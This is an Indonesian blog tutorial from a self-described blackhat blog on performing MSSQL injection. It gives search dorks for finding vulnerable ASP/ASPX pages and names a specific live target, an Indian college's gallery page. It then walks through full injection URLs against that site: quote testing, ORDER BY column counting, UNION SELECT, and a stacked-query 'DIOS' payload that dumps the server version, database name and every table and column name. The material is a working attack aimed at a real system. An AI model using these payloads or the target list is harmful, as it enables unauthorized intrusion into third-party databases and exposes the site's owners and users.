Beranda  ›  SQL Injection Tutorial

Cara Melakukan MSSQL Injection

Tulis Komentar Edit
Hai, bertemu lagi dengan saya Darkness di blog kami Screams Blackhat.

Kali ini saya akan menjelaskan bagaimana cara melakukan MSSQL Injection. Ok langsung saja ke materinya

Dork :
inurl:".aspx?id="
inurl:".asp?id="

Live target :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324

Ciri-ciri web yang MSSQL Injection adalah menggunakan format aspx/asp jika parameter webnya .aspx?id= atau .asp?id= bisa di pastikan web tersebut MSSQL Injection bukan SQL Injection

Pertama-tama seperti biasa kita cek vuln atau tidak webnya dengan cara memberikan single quote ( ' ) jika webnya vuln maka webnya akan error
Seperti ini :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'

Sebelum saya beri single quote :
Setelah saya beri single quote :

Webnya error (teks yang ada dalam webnya hilang) = vuln

Oke selanjutnya langsung saja kita order by, untuk mengetahui jumlah column errornya

https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'+order+by+1--+-
(tidak error)

Naik kan angka 1 menjadi 2 menjadi 3 dan seterusnya hingga webnya memunculkan error

https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'+order+by+2--+-
(tidak error)

https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'+order+by+3--+-
(error !!)

Nah sekarang kita udah tau errornya ada di angka 3, selanjutnya kita lakukan union select untuk mengetahui angka togelnya

https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324'+union+select+1,2--+-

Jangan lupa memberi tanda - di depan id=-4324 supaya webnya memunculkan angka togelnya

Penjelasan union select :
Kenapa union select sampai angka 2 saja? Kan error nya di angka 3? Karna errornya di angka 3 maka kita melakukan union select nya sampai 2 saja, jika errornya di angka 10 maka kita melakukan union select sampai angka 9.

Dan ketika saya enter 
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324'+union+select+1,2--+-

Webnya memunculkan angka togelnya/angka vuln nya, selanjutnya tinggal memberikan dios saja untuk membuka database webnya

Karna ini MSSQL Injection kita tidak memberikan dios di angka togelnya melainkan di depan parameternya collection=-4324'(dios)

Dios :
;BEGIN DECLARE @a varchar(8000) SET @a='<b><font color="red" size=3>Injected By Darkness</font></b><br><b>Version : </b>'%2b@@version%2b'<br><b>Database : </b>'%2bdb_name()%2b'<br><br>' SELECT @a=@a%2b'<li>'%2btable_name%2b' :: '%2bcolumn_name FROM information_schema.columns SELECT @a AS output INTO SCREAMS_BLACKHAT END

Kalian bisa mengubah SCREAMS_BLACKHAT menjadi nickname kalian atau yang lain bebas mau di ubah jadi apa aja, di sini saya menggunakan SCREAMS_BLACKHAT untuk outputnya.

Letakkan dios seperti ini :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324';BEGIN DECLARE @a varchar(8000) SET @a='<b><font color="red" size=3>Injected By Darkness</font></b><br><b>Version : </b>'%2b@@version%2b'<br><b>Database : </b>'%2bdb_name()%2b'<br><br>' SELECT @a=@a%2b'<li>'%2btable_name%2b' :: '%2bcolumn_name FROM information_schema.columns SELECT @a AS output INTO SCREAMS_BLACKHAT END--+-

Webnya kok ga munculin apa-apa? Tenang aja selanjutnya kita tinggal melakukan output menggunakan query union select tadi

Seperti ini :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324'+union+select+output,2+from+SCREAMS_BLACKHAT--+-

Dan kita telah berhasil membuka database webnya.

Mungkin sekian saja dari saya, jika ada yang masih kebingungan bisa hubungi saya lewat WhatsApp
Tampilkan Komentar
Sembunyikan Komentar

0 Komentar

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel